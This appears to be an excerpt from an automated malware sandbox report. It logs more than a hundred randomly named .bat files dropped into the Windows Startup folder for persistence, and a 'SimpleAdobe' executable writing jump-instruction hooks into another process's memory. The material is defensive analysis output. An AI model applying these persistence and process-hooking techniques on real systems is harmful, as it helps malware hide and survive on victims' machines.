                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsTljUDyfomCxhnzNXfr7Xm9.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LlgTJb1fsKZaWWGOHpA0Z7jy.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MeUXi1xZRfgTr34geRpmygtS.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfrK2eleGgknmu9FzWkpzB7c.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6xZdoDoBUE5p5eHQogOzmCAe.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxHbHMNvefHp2Hvr6DcpzhYd.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KD5MxYvzde1avFdeWwU1rF85.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BtjTi3FF9au1FQnlKymnDMg.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBjdJ2s3yN24CmoRslMpXshQ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fMi9oyVvviqTTN6Wr56ISLB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SobxUGvoTK5M02dimGqnbluB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzGR4bdGfx80t9z5gTXhjS5m.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNOt66EI4etu2JX94D2Yxd2b.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ljM3vcf9uuofRJ8ARCciU76L.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2GuBTHnmBkN3dSsucJeBkQG.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bRXCsNtemAFBshpyVJXEffxd.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BosibbTKPcpK0gAFoIDe9sCf.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1hkcRBWLeEPqv2ntphnoy15W.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oZiUKJGSA8G9xcONfqSnC56U.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\er4UWRAIc5nksPtzjAlnLniT.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TVAm1QI1IkUDwXuoaPmgOaGO.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8xb4CYcBawbLerlRgmQScw49.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UNhgzOtBFiyZVWZ3q4kFYqN6.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lgGvzEo7nECzBG3bpAxjivM.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbcng22Z0TSdvpG3NMlJFqMM.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WubC0DiuPPNp4xftV5ZUsBRa.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZZdfK51JZVeSwQUZVWqostT0.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKepX7TNvoxrvNCU36z69Z8U.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nqmQZESYWs8lMVQC5uSuvZGu.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YK212xIfnETeMj8HWzSaLpXm.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dfqsmrq9YcEQ7hPoIyQgCVFc.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t1VNoyGIaOw1GtxZ1M3tjpAQ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yja9y4U3Z3AC8NiP5CTtr4Gt.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t5Sezk8AJ1dVCIp8NlarOJfh.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MfQYCojjZujE183iHin4yvvN.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qjWESUwN5QphEhjbuV2RyE3e.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0tqRsZaQXhm54caqwDUXuMHC.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\84qHSnAnloUyGTjudCcnx8X7.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tnYvJsdw6gVMo54pPIPOTk7f.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ra9dznGmjOHpZAiuMncAyjjm.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BN2W9TNO6kL3gJzRRzdUbTZg.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HpILK5HtW16MD0UJ7pzV1QPJ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yv6LDN6gTc8YJ8q14nqOwadt.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sS6m1zJ7SM7VOu619Ye9oRPC.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DJXmw8FbD4RPPXhLeAm8SoVJ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfdWx9QBHbiX53OVW3ybKn3w.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cYTbNzYImrDYIx7DZ1mq8uju.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sPufcIhuWOPTECewJPFroVOs.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCp8sgzWACD6Vy523F9IlcQB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zEeQhGslvnDbo67JpIq1JJCf.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I1y6rl2pC8mUDNK8qfoy3mwi.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pc0fUYEqajLGUWQtn2ftxoqL.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r0iR2ukaNLwNYvPx5HIxG52l.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MLlWxWjkKRHHt42qJxZpv3D4.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kjmIHqcSIrCufgz14qWPPLBs.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRO1mDUXRTjz6psEJDnxyxnx.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QJOvieJeRHqxL1CkBVqLAHn4.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uh3nu45INFmWm7584kVwgFUO.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8U1eBzGHaaLerzhFHg9U9VIJ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6Lj2r8HjpXGeANxR3KECgncY.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13YCUaamLsi0QOacTlyUtCF3.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tsbzRFmTsKBykEPO6dTSp6Bo.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X92VSFxhiRrhLMunkKi2h57u.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wpfphpa0v7Nt73NmqVDrheEB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L66Dh4NdwdeMMxg3HjUpU2VV.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zf29JQFSkkWOPzBYpym8uJAy.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RSzAVr1FmnmbHDkLIrabhsTB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wnPWh6gigyeyZklNGZd5SKHQ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZboQ6QzDUJYdvbmW1ugLygi3.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERBtXO5ho7nmZoFsGYVG8xKj.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3rRyjClAJ2k30QIrWGpVFDpo.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XlekvkCI3kM0b7NtTDTdRwQu.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\913UuC1tRhVGy6AHxLqTaVLY.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UYav4djsSfeWrnxzOp8uz2JM.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5vz9LfAQRgiDqx5aIN1rUzgI.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7IdlNY4tr5xX5jsAv5Xm1aGP.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cg01RYFCgQ4yuUBvkQoejwXD.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ABVMMLQpGhcp1W2ujjO04sLV.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQToSS9BPvVcS8w6eNfcK0kY.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7bW39nU2llZKhOZXueEFrfF.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8ywURDw7C6zMeRsof3kBXxpU.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pLcp1mMRVrfoftEu1oKo7EQU.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VoYUQzlIPy2CQ7auo8daNx7A.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oX3RgNofkgZNW1Os252HClux.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4ZYRf5dx7GqJx3l35fKvDZO8.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8dIzwG40mmQ7mxh4nJYR7fin.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bUvvEC4G93x8m0jMUV1cvbkw.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\791uKA04n6KFLHtwHnjK9hoV.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\y0CqVXQV0YSEnDiptPiHGIIC.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kk0VS6Oeosw6tWUrpGI1GUiJ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hkdC1RojujX5k1DjwMZ3m53C.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwduwYkLXSb2GF3vux2rNkrk.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7k09nFNmfPaAV8TbITKMV0NQ.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OMg9VYGhTMmOWOdpeinUzXxS.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wo1P9zhTUjnTlrOeTp1sTnJB.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xSB004NwHIjUzPebzxfgYy6M.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C6plKnC16OcysWG3iYxCicta.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JwleVm0kNOyDWRFneHiO7JF2.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H4kJahC6qjDEJs4KOlT9YrLj.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BKTdFTil10Rxbx2AcPfv4Wbu.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5FShBkGLSUEUFI9VFZ0ECdTf.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vrn34hmXrMXoIyvZRaTgjkg0.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yLrCNsFDaU7gI96DJGkskDGD.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ahtOSjAvEodBTLojg8tYK2oi.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RfoG22ZLMmZUJmI5a4966mOY.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\O8Kgv0druxTFfZsHOwjgYEle.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3JuqN9hvCAys7Gy6oZZoCzhT.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBfUxqomlFONHrwoOa7bLerx.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JCpZnFr5MyYfVYa26BJ4tgNP.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\s43C8UHhQAcNSwRGxZag8EP2.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6OAGPNLo8g4FxLeXUjM1mrW.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KPWcHmXzjov5ISLdPxDhZLCg.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef27X2bsovEcForsSj11qs02.batJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pI9UCOqBrq3HW8eVihoQ9LjK.batJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 7E0005 value: E9 2B BA 6F 76
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 76EDBA30 value: E9 DA 45 90 89
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 7F0008 value: E9 8B 8E 73 76
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 76F28E90 value: E9 80 71 8C 89
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 2AA0005 value: E9 8B 4D 5D 73
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 76074D90 value: E9 7A B2 A2 8C
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 2AB0005 value: E9 EB EB 5D 73
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 7608EBF0 value: E9 1A 14 A2 8C
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 2AC0005 value: E9 8B 8A AE 73
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 765A8A90 value: E9 7A 75 51 8C
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 2AD0005 value: E9 2B 02 B0 73
                        Source: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exeMemory written: PID: 7488 base: 765D0230 value: E9 DA FD 4F 8C
